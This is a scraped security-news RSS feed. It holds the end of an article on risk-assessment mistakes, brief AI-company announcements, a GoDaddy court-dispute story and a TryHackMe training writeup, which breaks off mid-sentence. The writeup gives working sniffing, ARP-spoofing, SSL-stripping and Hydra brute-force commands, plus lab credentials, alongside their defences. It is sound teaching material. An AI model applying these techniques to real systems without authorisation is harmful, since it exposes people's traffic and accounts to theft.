<p>We see it all the time, Calderone says. “For instance, the assessment covers the production servers and the corporate network, but skips the old dev box in the corner, the third-party vendor portal nobody owns internally, or the API endpoint that was stood up for a project two years ago and never decommissioned.” Attackers don’t care about your scoping decisions, he says. “They look at the whole environment and find the thing you decided wasn’t worth assessing.”</p>



<p>AI is making the situation worse, Calderone says. Organizations are deploying AI tools, connecting them to internal systems, granting them access to sensitive data, and none of this is landing in the risk assessment. Meanwhile, AI agents are out there making API calls, accessing databases, and operating with credentials that nobody is tracking, he says.</p>



<p>“If your risk assessment was written before your organization started plugging AI into its workflows, it’s already stale,” Calderone warns.</p>



<h2 class="wp-block-heading">4. Overindexing on the risk register without checking your assumptions</h2>



<p>When the goal becomes completing the assessment instead of understanding actual exposure, the output is a document that satisfies auditors but misleads leadership, says Amit Basu, CIO and CISO at International Seaways, a major independent maritime shipping company that transports crude oil and refined petroleum products worldwide.</p>



<p>Such an attitude can create false confidence. Executives and board members see a completed risk register and assume the organization is protected, Basu says. Meanwhile, real threats go unaddressed because they didn’t fit neatly into the assessment framework. “The gotcha does not announce itself,” he explains. “It hides inside a green dashboard.”</p>



<p>A risk assessment is only as good as the assumptions that lie underneath it, Basu observes. “Document those assumptions explicitly and review them whenever your business changes, when the threat landscape shifts, or when an incident exposes a gap,” he advises. “The assessment is not a finished product — it’s a living input to an ongoing conversation between security and the business.”</p>



<h2 class="wp-block-heading">5. Failing to link risk with business impact</h2>



<p>Ignoring or downplaying the <a href="https://www.csoonline.com/article/4159317/cisos-reshape-their-roles-as-business-risk-strategists.html">connection between risk and business</a> makes it easier to de-prioritize or ignore problems, says Dan Moore, senior director of strategy and identity standards at FusionAuth, a customer identity and access management (CIAM) platform provider.</p>



<p>“As a result, it becomes difficult to communicate the real risks of breaches and other risks,” he states. “Worse yet, it gives security team members an excuse to complain about being misunderstood or not valued, which degrades team effectiveness.”</p>



<p>It’s important to be specific and targeted, Moore advises. “For instance, don’t say, ‘We have 95% patch compliance,’” he suggests. “Instead, talk about the risk unpatched systems pose to the business.” Some systems, such as legacy systems that aren’t connected to the internet or the core business, carry a lower risk than others, even if they have the same patch issues. “Acknowledge that fact and weigh your response.”</p>



<h2 class="wp-block-heading">6. Confusing compliance with real-world security</h2>



<p>Compliance alone doesn’t lead to good security, nor does it satisfy even the baseline requirements for effective protection, says Adriel Desautels, CEO of Netragard, a penetration testing and security advisory company.</p>



<p>Organizations tend to fall into this trap when they hire penetration testing firms that focus on compliance while promising top-tier services, Desautels says. “In truth, they deliver autonomous scanning masquerading as human-driven testing.”</p>



<p>The result is a false sense of security — a paper seatbelt, Desautels warns. “You feel protected, but when you crash, even at low speed, you get injured or worse,” he says. “Remember, every major breach in the past decade involved an organization that was compliant at the time of compromise.”</p>



<h2 class="wp-block-heading">7. Failing to fully understand risk</h2>



<p>Organizations often treat risk assessment as a vulnerability-cataloging exercise that includes finding gaps, counting severities, and passing the audit. Yet passing an audit and understanding risk are not the same thing, states Safi Raza, senior director of cyber security at Fusion Risk Management, a firm offering cloud-based operational resilience, business continuity, and risk management solutions.</p>



<p>Raza says that CISOs should focus on connecting technical risk signals to operational outcomes. “This includes understanding what services are affected, how disruption propagates, and what it means for revenue, customers, or regulatory obligations.”</p>



<p>Start by shifting from static assessments to continuous, context-driven risk visibility, Raza advises. “Risk needs to be understood not just technically, but in terms of business impact and financial exposure,” he states.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI, Grupo Folha and Grupo UOL announce strategic content partnership]]></title>
<description><![CDATA[OpenAI partners with Grupo Folha and Grupo UOL to bring trusted Brazilian journalism to ChatGPT, expanding access to news with attribution and transparency.]]></description>
<link>https://tsecurity.de/de/3647674/ai-nachrichten/openai-grupo-folha-and-grupo-uol-announce-strategic-content-partnership/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647674/ai-nachrichten/openai-grupo-folha-and-grupo-uol-announce-strategic-content-partnership/</guid>
<pubDate>Mon, 06 Jul 2026 05:03:52 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI partners with Grupo Folha and Grupo UOL to bring trusted Brazilian journalism to ChatGPT, expanding access to news with attribution and transparency.]]></content:encoded>
</item>
<item>
<title><![CDATA[Election information and safeguards in 2026]]></title>
<description><![CDATA[Ahead of global elections, we’re helping people access information, supporting cyber defenders, and increasing AI transparency]]></description>
<link>https://tsecurity.de/de/3647673/ai-nachrichten/election-information-and-safeguards-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647673/ai-nachrichten/election-information-and-safeguards-in-2026/</guid>
<pubDate>Mon, 06 Jul 2026 05:03:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ahead of global elections, we’re helping people access information, supporting cyber defenders, and increasing AI transparency]]></content:encoded>
</item>
<item>
<title><![CDATA[Our views on AI policy and political advocacy]]></title>
<description><![CDATA[Our approach to AI policy and political advocacy, transparency, support for thoughtful regulation and AI safety, and that no outside political group speaks on the company’s behalf.]]></description>
<link>https://tsecurity.de/de/3647661/ai-nachrichten/our-views-on-ai-policy-and-political-advocacy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647661/ai-nachrichten/our-views-on-ai-policy-and-political-advocacy/</guid>
<pubDate>Mon, 06 Jul 2026 05:03:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Our approach to AI policy and political advocacy, transparency, support for thoughtful regulation and AI safety, and that no outside political group speaks on the company’s behalf.]]></content:encoded>
</item>
<item>
<title><![CDATA[Supporting Europe’s work in ensuring a trustworthy AI ecosystem]]></title>
<description><![CDATA[OpenAI supports the EU Code of Practice on AI content transparency, advancing provenance standards and tools to help people understand AI-generated content.]]></description>
<link>https://tsecurity.de/de/3647640/ai-nachrichten/supporting-europes-work-in-ensuring-a-trustworthy-ai-ecosystem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647640/ai-nachrichten/supporting-europes-work-in-ensuring-a-trustworthy-ai-ecosystem/</guid>
<pubDate>Mon, 06 Jul 2026 05:03:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI supports the EU Code of Practice on AI content transparency, advancing provenance standards and tools to help people understand AI-generated content.]]></content:encoded>
</item>
<item>
<title><![CDATA[GoDaddy Warns India's Crackdown on Fake Site Registrars Could Upend Internet Privacy Everywhere]]></title>
<description><![CDATA["The internet is filled with fakes," writes Gizmodo. "A court in India is setting out to address the problem by requiring more transparency from domain registrars to make it easier to crack down on fraud. And while the intentions might be good, Reuters is reporting that major American domain regi...]]></description>
<link>https://tsecurity.de/de/3646948/it-security-nachrichten/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646948/it-security-nachrichten/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere/</guid>
<pubDate>Sun, 05 Jul 2026 17:58:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["The internet is filled with fakes," writes Gizmodo. "A court in India is setting out to address the problem by requiring more transparency from domain registrars to make it easier to crack down on fraud. And while the intentions might be good, Reuters is reporting that major American domain registrar GoDaddy is sounding the warning bells that the court's decision could fundamentally reshape the internet well beyond India's borders." 


GoDaddy argues the move would even make the internet less safe, reports Reuters :

[Online fraud] is a key challenge for Prime Minister Narendra Modi's government, which last year received 2.4 million complaints of alleged cyber fraud amounting to $2.4 billion. Starting in 2019, lawsuits were brought by dozens of Indian and global firms — Amazon against fake shopping sites trading on its name and McDonald's complaining against bogus sites offering franchises. [More than 20 companies filed a complaint, the article notes, including Microsoft.] In December, an Indian court blocked more than 1,100 such websites. The New Delhi judge however went further, ordering sweeping new measures that tech experts say have rewritten rules of internet governance: Domain sellers should not offer buyers free privacy protection by default, the buyer's details should be released to anyone with a "legitimate interest" within 72 hours, and website addresses that are variations of protected brand names must be prohibited. 


U.S.-based GoDaddy has challenged the directives before a larger bench of judges at the Delhi High Court, according to a Reuters review of non-public filings. It says the ruling will affect legitimate businesses that have names similar to big brands. Stopping privacy-by-default features, GoDaddy said, will result in public disclosure of name, address, telephone and email of legitimate website owners, exposing them to "foreseeable privacy and security risks" such as stalking and harassment. 

As domain names operate globally, not locally, the order could force GoDaddy to regulate website addresses across the world, it said. On the court's order imposing a 72-hour deadline on companies to provide registration details to anyone with "legitimate interest", GoDaddy argues it has no wherewithal to assess who has legitimate interest or not. The "commercially destabilising" directives may force domain name companies to "exit India", said one of GoDaddy's appeal documents that ran into 5,121 pages... GoDaddy rivals, Arizona-based Namecheap and Netherlands-based Hosting Concepts, have also challenged the New Delhi ruling, court records show, although Reuters could not ascertain details of their appeals... 

GoDaddy argues that diluting the privacy feature will run contrary to India's data protection law and the European Union GDPR law which mandates a "privacy by default" approach. Farzaneh Badii, a New York-based researcher on internet governance, criticised the New Delhi ruling, noting that Europe redacted such details because publishing them had been abused by harassment and targeted phishing. "The people exposed will be journalists, activists, small business owners, and private individuals. The brand impersonators will not," she said... 

While the sweeping December directives were issued by a court, they followed government's submissions, documents showed... The judges will hear the appeals on July 16. 



GoDaddy manages 80 million domains and serves over 20 million users, the article points out, with
annual revenue over $5 billion.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=GoDaddy+Warns+India's+Crackdown+on+Fake+Site+Registrars+Could+Upend+Internet+Privacy+Everywhere%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0526213%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0526213%2Fgodaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/05/0526213/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Protocols and Servers 2 TryHackMe Writeup]]></title>
<description><![CDATA[Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.No exploit. No zero-day. Just a protocol that was never built to keep a secret.That’s the uncomfortable little truth this room is built around. So le...]]></description>
<link>https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/900/1*7OqFQcrh6OcgOZyqGjAyqw.png"></figure><p>No exploit. No zero-day. Just a protocol that was never built to keep a secret.</p><p>That’s the uncomfortable little truth this room is built around. So let’s pull it apart.</p><p>Most of the internet’s classic protocols were designed in a more trusting era. It was a time when the people sharing a network mostly knew each other, and “someone might be listening” wasn’t the default assumption.</p><p>Those protocols still run everywhere. And many of them still send your credentials across the wire in plain text.</p><p><strong>Protocols and Servers 2</strong> on TryHackMe is about exactly that gap, and what closes it. It walks through three foundational attacks against network protocols, then the defenses that neutralize each one:</p><ul><li>Sniffing — quietly reading traffic off the wire</li><li>Man-in-the-Middle (MITM) — sitting between two parties and tampering</li><li>Password attacks — guessing or cracking the credentials themselves</li></ul><p>This is a writeup of the whole room: the concepts in plain language, the commands that matter, and the task answers explained. If you’re working through it yourself, follow along.</p><blockquote>One idea ties the entire room together: cleartext protocols are insecure by design. Everything else is a consequence of that single fact.</blockquote><h3>Part 1 — Sniffing Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/911/1*mxa7u-z6cA7UEL5f8tjJQg.png"></figure><p>A <strong>sniffing attack</strong> is the simplest idea in the room: use a packet-capture tool to grab traffic as it crosses the network, then read it.</p><p>If a protocol talks in cleartext, anyone positioned to see that traffic can pull out private messages or login credentials. Nothing is encrypted before it leaves your machine.</p><pre>"Isn't everything encrypted now?"</pre><p>It’s tempting to think sniffing is a solved, retro problem now that TLS is everywhere. It isn’t. It stays dangerous wherever cleartext still lives:</p><ul><li><strong>Internal corporate networks</strong>, where machine-to-machine traffic is often left unencrypted</li><li><strong>Legacy systems </strong>like old mail servers, embedded devices, and industrial control systems</li><li><strong>Misconfigured services</strong> where TLS is available but not strictly enforced</li><li><strong>IoT devices</strong> that habitually use plain protocols</li><li><strong>Wireless networks</strong>, where anyone in range can listen</li><li>After a MITM attack that has successfully downgraded or stripped encryption</li></ul><blockquote>In real internal pentests and red-team work, sniffing is still one of the most reliable ways to harvest credentials and learn how systems actually talk to each other.</blockquote><h3>The tools</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xBxcZK8PVBApVtltOosP4Q.jpeg"><figcaption>Wireshark</figcaption></figure><p>Capturing packets needs a network card and the right privileges (root on Linux, administrator on Windows). Here are the staples:</p><ul><li><strong>tcpdump</strong> — lightweight open-source CLI capture tool, preinstalled on most Linux systems.</li><li><strong>Wireshark</strong> — the GUI standard, with powerful filtering, protocol dissection, and visualization.</li><li><strong>tshark</strong> — Wireshark’s command-line sibling, great for scripting.</li></ul><blockquote>Worth knowing too: <strong>tcpflow</strong> (reassembles TCP streams), <strong>ngrep</strong> (pattern-matching in traffic), and <strong>NetworkMiner</strong> (extracts files from captures).</blockquote><blockquote>Specialized credential-grabbers exist, but tcpdump and Wireshark can do the job with a little effort.</blockquote><h3>Capturing POP3 credentials with tcpdump</h3><p>The classic demo: a user checks email over POP3 (port 110, cleartext).</p><p>With access to the traffic — via a wiretap, a switch’s port mirroring, ARP spoofing, a compromised host, or a successful MITM — you run this command:</p><pre>sudo tcpdump port 110 -A</pre><p>Breaking that down:</p><ul><li>sudo — packet capture needs root privileges.</li><li>port 110 — only keep traffic to or from the POP3 server.</li><li>-A — print packet contents as ASCII, so cleartext is human-readable.</li></ul><p>In the capture, the login arrives across two packets and reads straight out:</p><pre>… USER frank … PASS D2xc9CgD</pre><p>Username frank, password D2xc9CgD, handed over in plain sight.</p><blockquote>Wireshark gets you there even faster: type “pop” in the display filter, and only POP3 traffic remains, credentials included.</blockquote><h4>Handy tcpdump filters</h4><pre>+------------------------------------+-----------------------------------------------------------+<br>| Command                            | Purpose                                                   |<br>+------------------------------------+-----------------------------------------------------------+<br>| sudo tcpdump port 110 -A           | Capture traffic on port 110 (POP3) in readable ASCII      |<br>| sudo tcpdump host 10.20.30.148 -A  | Capture ASCII traffic to/from a specific host IP          |<br>| sudo tcpdump port 80 -A            | Capture HTTP traffic (credentials in POST data)           |<br>| sudo tcpdump port 21 -A            | Capture FTP traffic (cleartext credentials)               |<br>| sudo tcpdump -w capture.pcap       | Save raw network packets to a file for later analysis     |<br>| tcpdump -r capture.pcap -A         | Read and display a saved capture file in ASCII text       |<br>+------------------------------------+-----------------------------------------------------------+</pre><h4>Mitigation</h4><p>Any cleartext protocol is exposed. The only requirement for the attack is a vantage point between the two parties or on the same network segment.</p><p>The core fix is encryption. This means wrapping the protocol in TLS (like HTTP to HTTPS, FTP to FTPS, or POP3 to POP3S) and replacing Telnet with SSH.</p><p>Layered on top of that:</p><ul><li>Network segmentation to limit who can see whose traffic</li><li>Encrypted VLANs or tunnels for sensitive internal traffic</li><li>802.1X port-based authentication so unknown devices can’t connect</li><li>Zero-trust thinking: treat every network as hostile and encrypt everything</li><li>Monitoring for ARP spoofing and other redirection to catch sniffing in progress</li></ul><p>Question: How do you capture only Telnet traffic with tcpdump? Answer: Telnet runs on port 23, so you add “port 23”.</p><p>Question: What is the simplest Wireshark display filter for IMAP? Answer: “imap”.</p><h3>Part 2 — Man-in-the-Middle (MITM) Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*uImWCNSpEizR46XoZzoc7g.png"><figcaption>Man-in-the-Middle Attack</figcaption></figure><p>Sniffing is passive listening. A <strong>MITM attack</strong> is active.</p><p>The attacker slips between two parties (A and B) so that A thinks it’s talking to B, while everything actually flows through the attacker. They can read and completely alter the data.</p><p>The room’s example says it best: A asks to transfer $20, the attacker rewrites the amount mid-flight, and B acts on the tampered message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C0zge6WQ4_HZjbPjnt1i0g.png"><figcaption>Image 1 from the room</figcaption></figure><p>It works whenever the protocol doesn’t verify the authenticity and integrity of each message.</p><h4>Getting into the middle</h4><p>To sit between two parties, an attacker has to redirect traffic through their own machine. Common routes include:</p><ul><li><strong>ARP spoofing</strong> — on a local network, the attacker sends forged ARP messages tying their own MAC address to the gateway’s IP, routing traffic directly to them.</li><li><strong>DNS spoofing </strong>— feeding false DNS answers to send victims to attacker-controlled servers.</li><li><strong>Rogue access points </strong>— fake Wi-Fi setups (like “Airport_WiFi_Free”) that route every connected victim’s traffic through the attacker.</li><li><strong>BGP hijacking </strong>— announcing false routes at the internet’s routing layer to reroute traffic for whole organizations or regions.</li></ul><h4>The tooling</h4><ul><li><strong>Bettercap </strong>— the modern, actively maintained successor to Ettercap. Handles ARP/DNS spoofing, HTTP/HTTPS proxying, and is modular.</li><li><strong>Ettercap</strong> — the classic LAN MITM tool. It still works, but Bettercap is generally preferred today.</li><li><strong>mitmproxy </strong>— an interactive HTTPS proxy used for inspecting and modifying web traffic on the fly.</li><li><strong>Responder </strong>—<strong> </strong>Windows-focused<strong>.</strong> Abuses fallback name-resolution protocols (LLMNR, NBT-NS) that kick in when DNS fails, answering with its own IP to capture authentication hashes. A staple of internal Active Directory pentests.</li></ul><h4>MITM against encrypted traffic</h4><p>Encryption raises the bar, but it isn’t a magic shield:</p><ul><li><strong>SSL stripping</strong> — quietly downgrade the victim’s connection to plain HTTP while the attacker keeps an HTTPS link to the real server. This is easy to miss if the user never typed <em>“https://”</em> or didn’t check for the padlock icon.</li><li><strong>Fake certificates</strong> — present your own certificate and run two separate encrypted legs. This works if the victim blindly clicks through the browser warning or if a Certificate Authority is compromised.</li><li><strong>Compromised or rogue CAs </strong>— the most serious case. If an attacker controls a trusted CA, they can mint valid-looking certificates for absolutely any domain.</li></ul><h4>Modern defenses</h4><p>A decade of security hardening makes MITM much harder now:</p><ul><li><strong>HTTPS by default</strong> (browsers flag plain HTTP as “Not Secure”)</li><li><strong>HSTS</strong> (forces HTTPS and blocks stripping attacks)</li><li><strong>Certificate Transparency</strong> (public, auditable logs of all issued certificates)</li><li><strong>Certificate pinning</strong> (apps accept only specific, hardcoded keys)</li><li><strong>DANE</strong> (publishing certificate info in DNSSEC-signed DNS)</li></ul><p>MITM still succeeds when users ignore certificate warnings, apps validate keys poorly, the target speaks cleartext, or legacy gear lacks modern features.</p><p>The fundamental fix remains the same: cryptography. You need authentication plus encryption/signing, which is exactly what properly implemented TLS provides.</p><p><strong>Question 1:</strong> How many interfaces does Ettercap offer?</p><pre>Answer: 3</pre><p><strong>Question 2:</strong> How many ways can you invoke Bettercap?</p><pre>Answer: 3</pre><h3>Part 3 — TLS: The Fix for Both Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/1*3Qn-dR4Ps9kwTxZGqRBBHw.jpeg"></figure><p>Both sniffing and MITM share one cure: TLS (Transport Layer Security). This part of the room is the solution chapter.</p><h4>A quick history</h4><p>SSL appeared in 1994 via Netscape, with SSL 3.0 dropping in 1996 as the web grew into shopping and payments. TLS succeeded it in 1999.</p><p>Where things stand now:</p><ul><li>SSL 2.0 and 3.0 are deprecated and highly insecure. Never use them.</li><li>TLS 1.0 and 1.1 were officially deprecated in 2021 and dropped by major browsers.</li><li>TLS 1.2 (from 2008) is still widely used and secure when configured with modern ciphers.</li><li>TLS 1.3 (from 2018) is the current standard. It features fewer algorithms, a faster handshake, and forward secrecy by default.</li></ul><p>People still say “SSL certificate” out of habit, but in practice, everything modern uses TLS.</p><h4>Where TLS sits</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Q9wEkyyAKPn28lVN9bDX2Q.png"><figcaption>Image 2 from the room</figcaption></figure><p>Cleartext application-layer protocols send data entirely in the open.</p><p>TLS adds encryption just below the application protocol, wrapping its data before it hits the network card. On the OSI model, it lives right between the transport and application layers.</p><h4>Upgrading protocols with TLS</h4><ul><li>HTTP (Port 80) upgrades to HTTPS (Port 443)</li><li>FTP (Port 21) upgrades to FTPS (Port 990)</li><li>SMTP (Port 25) upgrades to SMTPS (Port 465)</li><li>POP3 (Port 110) upgrades to POP3S (Port 995)</li><li>IMAP (Port 143) upgrades to IMAPS (Port 993)</li></ul><p>It’s not just web and mail. DNS can be wrapped too via DoT (DNS over TLS) on port 853, or DoH (DNS over HTTPS) on port 443. Both stop eavesdroppers from seeing which sites you look up.</p><h4>Implicit TLS vs STARTTLS</h4><ul><li>Implicit TLS uses a dedicated port that is fully encrypted from the very first byte (like 443 or 993).</li><li>STARTTLS connects in cleartext on the normal port, then issues a “STARTTLS” command to upgrade the connection in place. This is common for email setup.</li></ul><blockquote>Both offer encryption, but implicit TLS is highly preferred.</blockquote><p>A MITM attacker can easily strip the STARTTLS command during negotiation and force the session to stay in cleartext if the client isn’t configured to require it.</p><h4>How HTTPS works</h4><p>Plain HTTP takes two steps: open a TCP connection, then send requests. HTTPS inserts a step in between:</p><ol><li>Establish a standard TCP connection.</li><li>Establish a TLS connection (the handshake).</li><li>Send the HTTP requests, which are now fully encrypted.</li></ol><p>A simplified TLS 1.2 handshake goes like this:</p><blockquote><strong>ClientHello</strong> (client offers its TLS versions and cipher suites) <strong>→</strong> <strong>ServerHello</strong> (server picks the parameters and sends its certificate) <strong>→ Key Exchange</strong> (both derive a shared secret)<strong> →</strong> <strong>Finished</strong> (both confirm and switch to encrypted communication):</blockquote><pre>ClientHello → ServerHello → Key Exchange → Finished</pre><h4>Certificates and trust</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/980/1*-10wNzrM0tEpRINoAqc5mQ.png"><figcaption>Certificate Authority (CA)</figcaption></figure><p>HTTPS leans on certificates signed by trusted Certificate Authorities (CAs). Your browser expects a valid certificate from a trusted CA, which proves you’re talking to the real server and blocks easy MITM attempts.</p><p>A certificate shows who it was issued to, who issued it, and its validity period. An expired certificate should never be trusted.</p><p>The modern ecosystem made this nearly universal thanks to automated platforms like <a href="https://letsencrypt.org/"><em>Let’s Encrypt</em></a>, which pushed global HTTPS traffic past 95%.</p><p><strong>Question:</strong> What is the three-letter acronym for the DNS protocol that uses TLS?</p><pre>Answer: DoT (DNS over TLS)</pre><h3>Part 4 — SSH: Secure Remote Administration</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/920/1*EidIDqyfQGBr2l3Y-KLmog.png"><figcaption>SSH</figcaption></figure><p>SSH (Secure Shell) is the secure replacement for Telnet. It is the universal way to administer servers, network gear, and cloud infrastructure.</p><p>The “S” means you can confirm the server’s identity, your messages are encrypted for the intended recipient only, and any data tampering is instantly detectable.</p><blockquote>It handles confidentiality and integrity seamlessly over port 22.</blockquote><h4>Authentication methods</h4><ul><li><strong>Password </strong>— The simplest method. The password rides the encrypted channel, but weak choices can still fall to brute-force attacks.</li><li><strong>Public key (recommended) </strong>— A private key stays on your machine, while the public key goes on the server. The server challenges you to prove you hold the private key without ever transmitting it.</li><li><strong>Certificate-based </strong>— An SSH CA signs user and host keys. This scales incredibly well because you don’t have to manually distribute public keys to every single server.</li><li><strong>MFA </strong>— Combines a traditional key or password with a one-time code for high-security environments.</li></ul><h4>Connecting</h4><ul><li>To connect, you run:</li></ul><pre>ssh mark@MACHINE_IP</pre><p>Enter the password or let your key authenticate, and you are on the remote terminal. Every single command you send runs over an encrypted channel.</p><p><strong>Question:</strong> Connect as mark (password XBtc49AB) and find the kernel release with uname -r.</p><pre>Commands: ssh mark@MACHINE_IP uname -r</pre><pre>Answer: 5.15.0–119-generic</pre><h4>Host key verification</h4><p>On your very first connection, SSH shows the server’s key fingerprint and asks if you want to continue.</p><p>Ideally, you verify this fingerprint through an admin or config management before typing “yes”. It is then saved in your local known_hosts file.</p><p>If that key ever changes unexpectedly in the future, SSH throws a massive warning, a major indicator of a potential MITM attack or a reinstalled server.</p><h4>Generating keys</h4><ul><li>To create a new key pair, run:</li></ul><pre>ssh-keygen -t ed25519 -C "your_email@example.com"</pre><p>The private key stays strictly on your machine and should be passphrase-protected. The public key (.pub) is safe to share. You can push it to a remote server easily using:</p><pre>ssh-copy-id mark@MACHINE_IP</pre><h4>Useful options</h4><pre>+--------------------------------------------+------------------------------------------------------------+<br>| Command                                    | Purpose                                                    |<br>+--------------------------------------------+------------------------------------------------------------+<br>| ssh -p 2222 mark@MACHINE_IP                | Connect to a remote server running on a non-standard port   |<br>| ssh -i ~/.ssh/custom_key mark@MACHINE_IP   | Specify a specific private key file to use for login       |<br>| ssh -J bastion.example.com mark@internal   | Jump through a secure bastion host to reach an internal IP |<br>| ssh -L 8080:localhost:80 mark@MACHINE_IP   | Set up a local port forward to tunnel traffic through SSH  |<br>| ssh -D 9050 mark@MACHINE_IP                | Create a dynamic SOCKS proxy forward for traffic routing   |<br>| ssh mark@MACHINE_IP "cat /etc/passwd"      | Run a single, one-off command without opening a full shell |<br>+--------------------------------------------+------------------------------------------------------------+</pre><h4>Secure file transfer</h4><ul><li><strong>SFTP</strong> — Interactive, FTP-like file management running completely over SSH. This is the recommended choice today.</li><li><strong>SCP </strong>— Simple file copies over SSH. This is now deprecated by OpenSSH in favor of SFTP, though it still works on most systems.</li><li><strong>rsync over SSH </strong>— The best option for large or repeated transfers because it only copies the specific parts of files that changed.</li></ul><p>To copy files via SCP:</p><pre>scp mark@MACHINE_IP:/home/mark/archive.tar.gz ~/ (remote to local)</pre><pre>scp backup.tar.bz2 mark@MACHINE_IP:/home/mark/ (local to remote)</pre><p><strong>Quick clarifier:</strong></p><blockquote>SFTP runs over SSH (port 22).</blockquote><blockquote>FTPS is FTP-over-TLS (port 990).</blockquote><p>They are entirely different protocols despite having similar names.</p><p><strong>Question:</strong> Download book.txt from the remote system; what download size did scp display in KB?</p><pre>Command: scp mark@MACHINE_IP:/home/mark/book.txt ~/</pre><pre>Answer: 415</pre><h4>Hardening SSH</h4><p>To protect a server, you can modify its config file <em>(/etc/ssh/sshd_config)</em>:</p><ul><li>Set PasswordAuthentication to “no” once public keys are established.</li><li>Set PermitRootLogin to “no” to force users to log in with regular accounts first.</li><li>Use AllowUsers or AllowGroups to create an explicit access whitelist.</li><li>Change the default port to reduce automated log noise.</li><li>Deploy fail2ban to automatically block IPs with repeated failed login attempts.</li></ul><h3>Part 5 — Password Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6_lWVwmNlB93-2JkYWo8Og.png"></figure><p>Even with a network fully encrypted, authentication remains a primary target. Authentication is simply the act of proving your identity, like entering a password to access a service.</p><p>The three factors:</p><ul><li><strong>Something you know </strong>— a password or PIN</li><li><strong>Something you have </strong>— a phone, hardware security key, or smart card</li><li><strong>Something you are </strong>— a fingerprint or facial scan</li></ul><p>This section focuses entirely on attacking “something you know.”</p><h4>Why weak passwords persist</h4><p>Massive historic breaches show that old habits die hard.</p><p>The most common passwords found in modern breaches still include variations like 123456, password, qwerty, Password1, and seasonal choices like Summer2024.</p><p>Because people constantly reuse passwords across multiple sites, a single leak frequently gives attackers access to entirely unrelated corporate or personal accounts.</p><h4>Types of attacks</h4><ul><li><strong>Guessing </strong>— using personal info like a target’s pet, birth year, or favorite sports team harvested from social media.</li><li><strong>Dictionary</strong>— automatically trying lists of real words and common variations.</li><li><strong>Brute force </strong>— systematically trying every possible characters combination. This is exhaustive, which is why password length matters so much.</li><li><strong>Credential stuffing</strong> — taking leaked username/password pairs from old breaches and automatically testing them against other web services.</li><li><strong>Password spraying </strong>— testing one or two incredibly common passwords against a massive list of user accounts to dodge lockout policies.</li><li><strong>Hybrid</strong> — combining dictionary words with systematic patterns, like capitalizing the first letter and adding a year to the end.</li></ul><h4>Wordlists</h4><ul><li>The classic go-to wordlist is RockYou, located on the TryHackMe AttackBox at:</li></ul><pre>/usr/share/wordlists/rockyou.txt</pre><blockquote>Beyond that, security professionals use collections like SecLists, CrackStation lists, or custom-generated lists tailored specifically to the target’s language, region, or industry habits.</blockquote><h4>THC Hydra</h4><p>Hydra is a fast network login cracker that throws wordlists at live services like FTP, POP3, IMAP, SSH, and HTTP.</p><p>The basic syntax looks like this:</p><pre>hydra -l username -P wordlist.txt server service</pre><ul><li>-l specifies a single username (-L for a text file of names)</li><li>-P specifies a password wordlist (-p for a single password)</li><li>server is the target IP or hostname</li><li>service is the protocol you are targeting</li></ul><p>Examples:</p><pre>hydra -l mark -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp<br>hydra -l frank -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh<br>hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><p>Handy options include -s to target a non-default port, -vV for detailed verbosity, -t to adjust parallel attack threads, and -f to immediately stop execution when the first valid password is found.</p><h4>Other tools</h4><p>Alternative online crackers include 